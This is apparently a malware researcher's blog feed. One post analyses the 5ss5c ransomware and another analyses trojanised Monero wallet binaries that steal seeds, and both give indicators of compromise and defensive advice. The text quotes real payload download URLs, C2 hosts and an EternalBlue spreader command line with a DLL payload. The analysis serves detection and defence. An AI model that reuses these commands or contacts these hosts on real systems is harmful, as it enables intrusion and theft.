<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-N8z368OK-II/XhuWMIXpdeI/AAAAAAAACSc/HgmxxJWb5m017agvWacwCki_180ukg45gCLcBGAsYHQ/s1600/iron4.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="116" data-original-width="430" height="107" src="https://1.bp.blogspot.com/-N8z368OK-II/XhuWMIXpdeI/AAAAAAAACSc/HgmxxJWb5m017agvWacwCki_180ukg45gCLcBGAsYHQ/s400/iron4.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - certutil logging</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
It will download and leverage:<br />
<br />
<ul>
<li>Spreader (EternalBlue and hardcoded credentials);</li>
<li>Mimikatz and what appears another password dumper/stealer;</li>
<li>The actual ransomware.</li>
</ul>
<div>
<br />
The following hashes are relevant to this new variant:<br />
<br />
<b>Name</b>: down.txt<br />
<b>URL</b>: http://58.221.158[.]90:88/car/down.txt<br />
<b>Purpose</b>: Downloader<br />
<b>MD5</b>: 680d9c8bb70e38d3727753430c655699<br />
<b>SHA1</b>: 5e72192360bbe436a3f4048717320409fb1a8009<br />
<b>SHA256</b>: ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f<br />
<b>Compilation timestamp</b>: 2020-01-11 19:04:24<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f/summary" target="_blank">ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f</a><br />
<br />
<b>down.txt</b> is, as mentioned, the downloader for the spreader module and for the actual ransomware:<br />
<br />
<b>Name</b>: c.dat<br />
<b>URL</b>: http://58.221.158[.]90:88/car/c.dat<br />
<b>Purpose</b>: spreader<br />
<b>MD5</b>: 01a9b1f9a9db526a54a64e39a605dd30<br />
<b>SHA1</b>: a436e3f5a9ee5e88671823b43fa77ed871c1475b<br />
<b>SHA256</b>: 9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc<br />
<b>Compilation timestamp</b>: 2020-01-11 19:19:54<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc/details" target="_blank">9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc</a><br />
<br />
<b>Name</b>: cpt.dat<br />
<b>URL</b>: http://58.221.158[.]90:88/car/cpt.dat<br />
<b>Purpose</b>: ransomware<br />
<b>MD5</b>: 853358339279b590fb1c40c3dc0cdb72<br />
<b>SHA1</b>: 84825801eac21a8d6eb060ddd8a0cd902dcead25<br />
<b>SHA256</b>: ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c<br />
<b>Compilation timestamp</b>: 2020-01-11 19:54:25<br />
<b>VirusTotal report</b>:<br />
<a href="https://www.virustotal.com/gui/file/ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c/details" target="_blank">ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c</a><br />
<b>Fun fact</b>: file version information contains "<b>TODO: 5SS5C Encoder</b>".<br />
<br />
The compilation times are sequential, which makes sense - the downloader has been developed (and compiled) first, then the spreader and the actual ransomware.<br />
<br />
Note that <b>cpt.exe</b> as filename has already been observed in Satan ransomware.<br />
<br />
Further indicators, such as hashes, URLs, file paths and so on will be posted at the end of this blog post.<br />
<br />
<br /></div>
<div>
<span style="font-size: large;"><b>5ss5c - still in development - and with oddities</b></span></div>
<div>
<br /></div>
<div>
There's quite some curiosities that indicate 5ss5c is still in active development and stems from Satan ransomware, for example:</div>
<div>
<br /></div>
<div>
<ul>
<li>There are several logs created, e.g. there is a file "<i>C:\Program Files\Common Files\System\Scanlog</i>" that simply logs whether IPC SMB is open/available;</li>
<li>Certutil logging (successful download or not);</li>
<li>There are several Satan ransomware artefacts;</li>
<li>Other Tactics, Techniques and Procedures (TTP) align with both Satan (and DBGer), and slightly overlap with Iron: </li>
<ul>
<li>One of these is, for example, the use of multiple packers to protect their droppers and payloads. </li>
<li>This time however, they decided to use both MPRESS and Enigma, and even Enigma VirtualBox! (Note: Enigma and Enigma VirtualBox are not the same - the latter is a <u>virtualised</u> packer and also referred to as EnigmaVM.)</li>
</ul>
</ul>
<div>
<br /></div>
</div>
<div>
<br /></div>
<div>
However, there are quite some curiosities, one of them being what appear to be hardcoded credentials:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-8QkMhsYOnUg/XhubeA08-iI/AAAAAAAACSo/KJgfA_JcyzggNVN2pk05W-2TnYaImrFCACLcBGAsYHQ/s1600/db.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="407" data-original-width="422" height="308" src="https://1.bp.blogspot.com/-8QkMhsYOnUg/XhubeA08-iI/AAAAAAAACSo/KJgfA_JcyzggNVN2pk05W-2TnYaImrFCACLcBGAsYHQ/s320/db.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Hardcoded creds</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
These hardcoded credentials will be leveraged in an attempt to connect to an SQL database with the <b>xp_cmdshell</b> command:</div>
<div>
<a href="https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15">https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/xp-cmdshell-transact-sql?view=sql-server-ver15</a></div>
<div>
<br /></div>
<div>
Curiously, we can identify the following data inside the ransomware in regards to the SQL database:</div>
<div>
<div>
<ul>
<li>ecology.url</li>
<li>ecology.password</li>
<li>ecology.user</li>
</ul>
</div>
</div>
<div>
Searching a bit further, we can discover a company named Finereport (<a href="https://www.finereport.com/en/company">https://www.finereport.com/en/company</a>), which claims to be "<i>Top 1 in China’s BI market share in IDC "China BI Software Tracker, 2018</i>". You guessed it - it uses SQL as database.</div>
<div>
<br />
What else is new is, as mentioned before, the use of Enigma VirtualBox for packing an additional spreader module, aptly named <b>poc.exe</b>. This suggest they may be experimenting (<b>poc</b> often is an acronym for <b>p</b>roof <b>o</b>f <b>c</b>oncept).<br />
<br />
This file will be dropped to <b>C:\ProgramData\poc.exe</b> and will run the following command:<br />
<br />
<blockquote class="tr_bq">
<i>cd /D C:\ProgramData&star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp </i></blockquote>
Now compare this to Satan ransomware's command:<br />
<br />
<blockquote class="tr_bq">
<i>cmd /c cd /D C:\Users\Alluse~1\&blue.exe --TargetIp & star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload down64.dll --TargetIp </i></blockquote>
Something looks similar here... :-)<br />
<br />
<br />
<b style="font-size: x-large;">5ss5c ransomware - how it operates</b><br />
<b style="font-size: x-large;"><br /></b></div>
<div>
Back to the actual ransomware. It will create the following mutexes:</div>
<div>
<ul>
<li><b>SSSS_Scan </b>(in previous iterations SSS_Scan has also been observed)</li>
<li><b>5ss5c_CRYPT</b></li>
</ul>
</div>
<div>
<br /></div>
<div>
Just like its predecessor, 5ss5c also has an exclusion list, where it will not encrypt specific files as well as files in the following folders:<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-OeBoVBRGB2Y/Xh41IIQHJTI/AAAAAAAACS4/Tl9K9cmfHRQuDaiZI-LpguG0mNizQtCCQCLcBGAsYHQ/s1600/excl.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="674" data-original-width="798" height="270" src="https://1.bp.blogspot.com/-OeBoVBRGB2Y/Xh41IIQHJTI/AAAAAAAACS4/Tl9K9cmfHRQuDaiZI-LpguG0mNizQtCCQCLcBGAsYHQ/s320/excl.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Exclusion list</td></tr>
</tbody></table>
<br /></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
For example, the following folders belonging to Qihoo 360 (an internet security company based in China also offering antivirus) were already excluded in Satan and DBGer ransomware:<br />
<br />
<ul>
<li>360rec</li>
<li>360sec</li>
<li>360sand</li>
</ul>
<br />
<br />
While these are new in 5ss5c ransomware:<br />
<br />
<ul>
<li>360downloads</li>
<li>360safe</li>
</ul>
<br />
<br />
As in previous iterations, 5ss5c ransomware will stop database-related services and processes.<br />
<br />
It will however only encrypt files with the following extensions:<br />
<blockquote class="tr_bq">
<i>7z, bak, cer, csv, db, dbf, dmp, docx, eps, ldf, mdb, mdf, myd, myi, ora, pdf, pem, pfx, ppt, pptx, psd, rar, rtf, sql, tar, txt, vdi, vmdk, vmx, xls, xlsx, zip</i></blockquote>
This extension list is not like before, and includes mostly documents, archives, database files and VMware-related extensions such as <i>vmdk</i>.<br />
<br />
The ransomware will then create the following URI structure to communicate with the C2 server (<i>61.186.243[.]2</i>):<br />
<br />
<ul>
<li>/api/data.php?code=</li>
<li>&file=</li>
<li>&size=</li>
<li>&status=</li>
<li>&keyhash=</li>
</ul>
<div>
It will also create a ransomware note on the <b>C:\</b> drive as: <b>_如何解密我的文件_.txt </b>which translates to <b>_How to decrypt my file_.txt</b>. Example content is as follows:</div>
<div>
<br /></div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-T0B4txHlNHs/Xh4-raVFVtI/AAAAAAAACTE/R-YoW8QHFLsuD140AF9vD-_rOifULExUgCLcBGAsYHQ/s1600/note.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="862" data-original-width="1291" height="213" src="https://1.bp.blogspot.com/-T0B4txHlNHs/Xh4-raVFVtI/AAAAAAAACTE/R-YoW8QHFLsuD140AF9vD-_rOifULExUgCLcBGAsYHQ/s320/note.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 5 - ransom note</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
The content reads:</div>
<div>
<br /></div>
<br />
<blockquote>
<i>部分文件已经被加密<br />如果你想找回加密文件,发送 (1) 个比特币到我的钱包<br />从加密开始48小时之内没有完成支付,解密的金额会发生翻倍.<br />如果有其他问题,可以通过邮件联系我<br /><br />您的解密凭证是 :<br /><snip><br />Email:[5ss5c@mail.ru]</snip></i></blockquote>
<div>
<br /></div>
<div>
Translated:</div>
<div>
<br /></div>
<div>
<blockquote>
<i>Some files have been encrypted<br />If you want to retrieve the encrypted file, send (1) Bitcoins to my wallet<br />If payment is not completed within 48 hours from the start of encryption, the amount of decryption will double.<br />If you have other questions, you can contact me by email<br />Your decryption credentials are:<br /><snip><br />Email: [5ss5c@mail.ru]</snip></i></blockquote>
<br />
Interestingly, the ransomware note does not contain a Bitcoin address. Additionally, the note only contains instructions in Chinese, not Korean nor English like previous iterations. Is 5ss5c ransomware more targeted, or just actively being tested by the group/developers behind it?<br />
<br />
Encrypted files will have the actor's email address prepended and a unique token with the ransomware's name will be appended, for example;<br />
<i>test.txt</i> becomes <i>[5ss5c@mail.ru]test.txt.Y54GUHKIG1T2ZLN76II9F3BBQV7MK4UOGSQUND7U.5ss5c</i>.<br />
<br />
<br />
<div>
<b><span style="font-size: large;">Prevention</span></b></div>
<div>
<ul>
<li>Enable UAC;</li>
<li>Enable Windows Update, and install updates (especially verify if <a href="https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010" target="_blank">MS17-010</a> is installed);</li>
<li>Install an antivirus, and keep it up-to-date and running;</li>
<li>Install a firewall, or enable the Windows Firewall;</li>
<li>Restrict, where possible, access to shares (ACLs);</li>
<li>Create backups! (and test them)</li>
</ul>
<div>
More ransomware prevention can be found <a href="https://bartblaze.blogspot.co.uk/p/ransomware-prevention.html" target="_blank">here</a>.</div>
</div>
<br />
<b><span style="font-size: large;">Conclusion</span></b><br />
<b><br /></b>
Satan is dead, long live 5ss5c! It just doesn't sound as good, does it?<br />
<br />
Whoever's behind the development of Satan, DBGer, Lucky and likely Iron ransomware, is back in business with the 5ss5c ransomware, and it appears to be in active development - and is trying to increase (or perhaps focus?) its targeting and spread of the ransomware.<br />
<br />
It is recommended organisations detect and/or search for the indicators of compromise (IOCs) below, and have proper prevention controls in place. MITRE ATT&CK IDs can also be found below.<br />
<div>
<br />
<b>Indicators of Compromise</b>:<br />
<br />
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #104E8B;
color: #FFF;
font-weight: bold;
}
</style>
<br />
<style type="text/css">
table.tableizer-table {
font-size: 12px;
border: 1px solid #CCC;
font-family: Arial, Helvetica, sans-serif;
}
.tableizer-table td {
padding: 4px;
margin: 3px;
border: 1px solid #CCC;
}
.tableizer-table th {
background-color: #104E8B;
color: #FFF;
font-weight: bold;
}
</style>
<br />
<table class="tableizer-table">
<thead>
<tr class="tableizer-firstrow"><th>Type </th><th>Indicator</th></tr>
</thead><tbody>
<tr><td>File </td><td>C:\Program Files\Common Files\System\Scanlog</td></tr>
<tr><td>File </td><td>C:\Program Files\Common Files\System\cpt.exe</td></tr>
<tr><td>File </td><td>C:\Program Files\Common Files\System\tmp</td></tr>
<tr><td>File </td><td>C:\ProgramData\5ss5c_token</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.fb</td></tr>
<tr><td>File </td><td>C:\ProgramData\blue.xml</td></tr>
<tr><td>File </td><td>C:\ProgramData\down64.dll</td></tr>
<tr><td>File </td><td>C:\ProgramData\mmkt.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\poc.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.exe</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.fb</td></tr>
<tr><td>File </td><td>C:\ProgramData\star.xml</td></tr>
<tr><td>Registry key </td><td>SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5ss5cStart</td></tr>
<tr><td>Command </td><td>C:\Windows\system32\cmd.exe /c cd /D C:\ProgramData&blue.exe --TargetIp</td></tr>
<tr><td>Command </td><td>star.exe --OutConfig a --TargetPort 445 --Protocol SMB --Architecture x64 --Function RunDLL --DllPayload C:\ProgramData\down64.dll --TargetIp</td></tr>
<tr><td>Mutex </td><td>SSSS_Scan</td></tr>
<tr><td>Mutex </td><td>5ss5c_CRYPT</td></tr>
<tr><td>Email </td><td>5ss5c@mail.ru</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/down.txt</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/c.dat</td></tr>
<tr><td>URL </td><td>http://58.221.158.90:88/car/cpt.dat</td></tr>
<tr><td>IP </td><td>58.221.158.90</td></tr>
<tr><td>IP </td><td>61.186.243.2 </td></tr>
<tr><td>Hash </td><td>82ed3f4eb05b76691b408512767198274e6e308e8d5230ada90611ca18af046d</td></tr>
<tr><td>Hash </td><td>dc3103fb21f674386b01e1122bb910a09f2226b1331dd549cbc346d8e70d02df</td></tr>
<tr><td>Hash </td><td>9a1365c42f4aca3e9c1c5dcf38b967b73ab56e4af0b4a4380af7e2bf185478bc</td></tr>
<tr><td>Hash </td><td>af041f6ac90b07927696bc61e08a31a210e265a997a62cf732f7d3f5c102f1da</td></tr>
<tr><td>Hash </td><td>ca154fa6ff0d1ebc786b4ea89cefae022e05497d095c2391331f24113aa31e3c</td></tr>
<tr><td>Hash </td><td>e685aafc201f851a47bc926dd39fb12f4bc920f310200869ce0716c41ad92198</td></tr>
<tr><td>Hash </td><td>e5bb194413170d111685da51b58d2fd60483fc7bebc70b1c6cb909ef6c6dd4a9</td></tr>
<tr><td>Hash </td><td>ddfd1d60ffea333a1565b0707a7adca601dafdd7ec29c61d622732117416545f</td></tr>
<tr><td>Hash </td><td>ef90dcc647e50c2378122f92fba4261f6eaa24b029cfa444289198fb0203e067</td></tr>
<tr><td>Hash </td><td>47fa9c298b904d66a5eb92c67dee602198259d366ef4f078a8365beefb9fdc95</td></tr>
<tr><td>Hash </td><td>68e644aac112fe3bbf4e87858f58c75426fd5fda93f194482af1721bc47f1cd7</td></tr>
<tr><td>Hash </td><td>ea7caa08e115dbb438e29da46b47f54c62c29697617bae44464a9b63d9bddf18</td></tr>
<tr><td>Hash </td><td>23205bf9c36bbd56189e3f430c25db2a27eb089906b173601cd42c66a25829a7</td></tr>
<tr><td>Hash </td><td>a46481cdb4a9fc1dbdcccc49c3deadbf18c7b9f274a0eb5fdf73766a03f19a7f</td></tr>
<tr><td>Hash </td><td>cf33a92a05ba3c807447a5f6b7e45577ed53174699241da360876d4f4a2eb2de</td></tr>
<tr><td>Hash </td><td>8e348105cde49cad8bfbe0acca0da67990289e108799c88805023888ead74300</td></tr>
<tr><td>Hash </td><td>ad3c0b153d5b5ba4627daa89cd2adbb18ee5831cb67feeb7394c51ebc1660f41</td></tr>
<tr><td>Hash </td><td>de3c5fc97aecb93890b5432b389e047f460b271963fe965a3f26cb1b978f0eac</td></tr>
<tr><td>Hash </td><td>bd291522025110f58a4493fad0395baec913bd46b1d3fa98f1f309ce3d02f179</td></tr>
<tr><td>Hash </td><td>75d543aaf9583b78de645f13e0efd8f826ff7bcf17ea680ca97a3cf9d552fc1f</td></tr>
<tr><td>Hash </td><td>50e771386ae200b46a26947665fc72a2a330add348a3c75529f6883df48c2e39</td></tr>
<tr><td>Hash </td><td>0aa4b54e9671cb83433550f1d7950d3453ba8b52d8546c9f3faf115fa9baad7e</td></tr>
<tr><td>Hash </td><td>5d12b1fc6627b0a0df0680d6556e782b8ae9270135457a81fe4edbbccc0f3552</td></tr>
</tbody></table>
<br />
<br />
These indicators are also available on AlienVault OTX:<br />
<a href="https://otx.alienvault.com/pulse/5e1e45cddcc6457fa4ce6c5a" target="_blank">Satan ransomware rebrands as 5ss5c ransomware</a><br />
<br />
<b>MITRE ATT&CK techniques</b><br />
<div>
<br /></div>
<div>
<ul>
<li><a href="https://attack.mitre.org/techniques/T1210/" target="_blank">T1210 - Exploitation of Remote Services</a></li>
<li><a href="https://attack.mitre.org/techniques/T1003/" target="_blank">T1003 - Credential Dumping</a></li>
<li><a href="https://attack.mitre.org/techniques/T1486/" target="_blank">T1486 - Data Encrypted for Impact</a></li>
<li><a href="https://attack.mitre.org/techniques/T1105/" target="_blank">T1105 - Remote File Copy</a></li>
<li><a href="https://attack.mitre.org/techniques/T1027/" target="_blank">T1027 - Obfuscated Files or Information</a></li>
<li><a href="https://attack.mitre.org/software/S0002/" target="_blank">S0002 - Mimikatz</a></li>
</ul>
</div>
<br />
<br /></div>
</div>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
Barthttp://www.blogger.com/profile/18326761248866196755noreply@blogger.com0tag:blogger.com,1999:blog-606282676955748155.post-91970133338435517672019-11-19T23:18:00.001+01:002019-11-22T10:49:13.911+01:00Monero download site and binaries compromised<div>
<br />
<b><span style="font-size: large;">Introduction</span></b><br />
<br /></div>
<div>
Earlier this evening I saw a tweet appear which claimed Monero has been hacked and a malicious binary (instead of the real one) has been served:</div>
<div>
<br /></div>
<div>
<blockquote class="twitter-tweet">
<div dir="ltr" lang="en">
Warning Monero users: If you downloaded Monero in the past 24 hours you may have installed malware. Monero's official website served compromised binaries for at least 30 minutes during the past 24 hours. Investigations are ongoing. <a href="https://t.co/geqA4dIPar">https://t.co/geqA4dIPar</a></div>
— dark.fail (@DarkDotFail) <a href="https://twitter.com/DarkDotFail/status/1196668999519657984?ref_src=twsrc%5Etfw">November 19, 2019</a></blockquote>
<script async="" charset="utf-8" src="https://platform.twitter.com/widgets.js"></script>
</div>
<div>
<br /></div>
<div>
Post on Reddit:<br />
<a href="https://www.reddit.com/r/Monero/comments/dyfozs/security_warning_cli_binaries_available_on/" target="_blank">https://www.reddit.com/r/Monero/comments/dyfozs/security_warning_cli_binaries_available_on/</a><br />
<br />
Github issue:<br />
<a href="https://github.com/monero-project/monero/issues/6151" target="_blank">https://github.com/monero-project/monero/issues/6151</a><br />
<br />
<br />
<b><span style="font-size: large;">Linux binary</span></b><br />
<br />
Thanks to user <i>nikitasius </i>I was able to retrieve the malicious binary:<br />
<a href="https://github.com/monero-project/monero/issues/6151#issuecomment-555511805" target="_blank">https://github.com/monero-project/monero/issues/6151#issuecomment-555511805</a><br />
<br />
This binary is an ELF file with the following properties:<br />
<ul>
<li>MD5: d267be7efc3f2c4dde8e90b9b489ed2a</li>
<li>SHA-1: 394bde8bb86d75eaeee69e00d96d8daf70df4b0a</li>
<li>SHA-256: 7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31</li>
<li>File type: ELF</li>
<li>Magic: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked (uses shared libs), for GNU/Linux 3.2.0, from 'x)', not stripped</li>
<li>File size: 27.63 MB (28967688 bytes)</li>
<li>VirusTotal report: <a href="https://www.virustotal.com/gui/file/7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31/summary" target="_blank">https://www.virustotal.com/gui/file/7ab9afbc5f9a1df687558d570192fbfe9e085712657d2cfa5524f2c8caccca31/summary</a></li>
</ul>
<div>
When comparing the legitimate file and this ELF file, we notice the file size is different, and a few new functions have been added:</div>
<div>
<br /></div>
<div>
<b>cryptonote::simple_wallet::send_seed</b></div>
<div>
<b><br /></b></div>
<div>
This function is immediately called after either opening or creating a new wallet, as can be seen in Figure 1 and 2 below.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-XHNEOBK6e7k/XdRcYIFLrKI/AAAAAAAACQg/LZPntlADAIYAlM_oSaenYzbA7U0fa4QyQCLcBGAsYHQ/s1600/create_wallet.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="312" data-original-width="720" height="172" src="https://1.bp.blogspot.com/-XHNEOBK6e7k/XdRcYIFLrKI/AAAAAAAACQg/LZPntlADAIYAlM_oSaenYzbA7U0fa4QyQCLcBGAsYHQ/s400/create_wallet.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 1 - Create wallet (legitimate)</td></tr>
</tbody></table>
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-vJ1q_yGPD5s/XdRcYARrHeI/AAAAAAAACQk/HjcObVCjKzIdNq6fWtxLjyWS0QcmKXqwwCLcBGAsYHQ/s1600/seed.png" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="652" data-original-width="1600" height="162" src="https://1.bp.blogspot.com/-vJ1q_yGPD5s/XdRcYARrHeI/AAAAAAAACQk/HjcObVCjKzIdNq6fWtxLjyWS0QcmKXqwwCLcBGAsYHQ/s400/seed.png" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 2 - Call new seed function</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The seed will be sent to: node.hashmonero[.]com.<br />
<br />
<b>cryptonote::simple_wallet::send_to_cc</b><br />
<br />
As you may have guessed, this function will send data off to the CC or C2 (command and control) server - this will be stolen funds.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-md4Kntj_F9Q/XdRgmp8vKrI/AAAAAAAACQ8/smW9J4qlWGI425t6jZvhJHLqYIEhGOgZQCLcBGAsYHQ/s1600/sendtocc.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="151" data-original-width="737" height="81" src="https://1.bp.blogspot.com/-md4Kntj_F9Q/XdRgmp8vKrI/AAAAAAAACQ8/smW9J4qlWGI425t6jZvhJHLqYIEhGOgZQCLcBGAsYHQ/s400/sendtocc.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 3 - Send to cc</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Sending funds to the C2 is handled using an HTTP POST request to the following C2 servers:<br />
<br />
<ul>
<li>node.xmrsupport[.]co</li>
<li>45.9.148[.]65</li>
</ul>
<br />
As far I can see, it doesn't seem to create any additional files or folders - it simply steals your seed and attempts to exfiltrate funds from your wallet.<br />
<br />
<b><span style="font-size: large;">Windows binary</span></b><br />
<br />
The C2 server 45.9.148[.]65 also hosts a Windows binary with the following properties:<br />
<br />
<ul>
<li>MD5: 72417ab40b8ed359a37b72ac8d399bd7</li>
<li>SHA-1: 6bd94803b3487ae1997238614c6c81a0f18bcbb0</li>
<li>SHA-256: 963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74</li>
<li>File type: Win32 EXE</li>
<li>Magic: PE32+ executable for MS Windows (console) Mono/.Net assembly</li>
<li>File size: 65.14 MB (68302960 bytes)</li>
<li>VirusTotal report: <a href="https://www.virustotal.com/gui/file/963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74/summary" target="_blank">https://www.virustotal.com/gui/file/963c1dfc86ff0e40cee176986ef9f2ce24fda53936c16f226c7387e1a3d67f74/summary</a></li>
</ul>
<br />
The Windows version is essentially doing the same things as the Linux version - stealing your seed and wallet funds - the function names are just different, e.g. <b>_ZN10cryptonote13simple_wallet9send_seedERKN4epee15wipeable_stringE</b>.<br />
<br />
<table cellpadding="0" cellspacing="0" class="tr-caption-container" style="float: left; margin-right: 1em; text-align: left;"><tbody>
<tr><td style="text-align: center;"><a href="https://1.bp.blogspot.com/-xsAa0ktat4c/XdRjsnm78aI/AAAAAAAACRI/0jhOY6UrmvwJ8WAQfVS0JMH1HOBoWvpqACLcBGAsYHQ/s1600/seed-win.PNG" imageanchor="1" style="clear: left; margin-bottom: 1em; margin-left: auto; margin-right: auto;"><img border="0" data-original-height="177" data-original-width="664" height="106" src="https://1.bp.blogspot.com/-xsAa0ktat4c/XdRjsnm78aI/AAAAAAAACRI/0jhOY6UrmvwJ8WAQfVS0JMH1HOBoWvpqACLcBGAsYHQ/s400/seed-win.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Figure 4 - Send to cc</td></tr>
</tbody></table>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b>Note</b>: this doesn’t mean the official Windows binary was also compromised - it simply means there’s also a compromised Windows binary out there. Only the Monero team can confirm if other binaries (besides the Linux one mentioned in this blog) have been compromised.<br />
<br />
<b><span style="font-size: large;">Detection</span></b><br />
<br />
<ul>
<li>If you have a firewall or proxy, whether hardware or software, verify if you had any network traffic or connections to;</li>
<ul>
<li>node.hashmonero[.]com</li>
<li>node.xmrsupport[.]co</li>
<li>45.9.148[.]65</li>
<li>91.210.104[.]245</li>
</ul>
<li>Remove all the binaries listed in this blog post;</li>
<li>Verify the hashes of your Monero setup or installer file. Guides to do that here;</li>
<ul>
<li>Beginner: <a href="https://src.getmonero.org/resources/user-guides/verification-windows-beginner.html" target="_blank">https://src.getmonero.org/resources/user-guides/verification-windows-beginner.html</a></li>
<li>Advanced: <a href="https://src.getmonero.org/resources/user-guides/verification-allos-advanced.html" target="_blank">https://src.getmonero.org/resources/user-guides/verification-allos-advanced.html</a></li>
<li>Note: hashes list is available here: <a href="https://web.getmonero.org/downloads/hashes.txt" target="_blank">https://web.getmonero.org/downloads/hashes.txt</a>.</li>
</ul>
</ul>
<div>
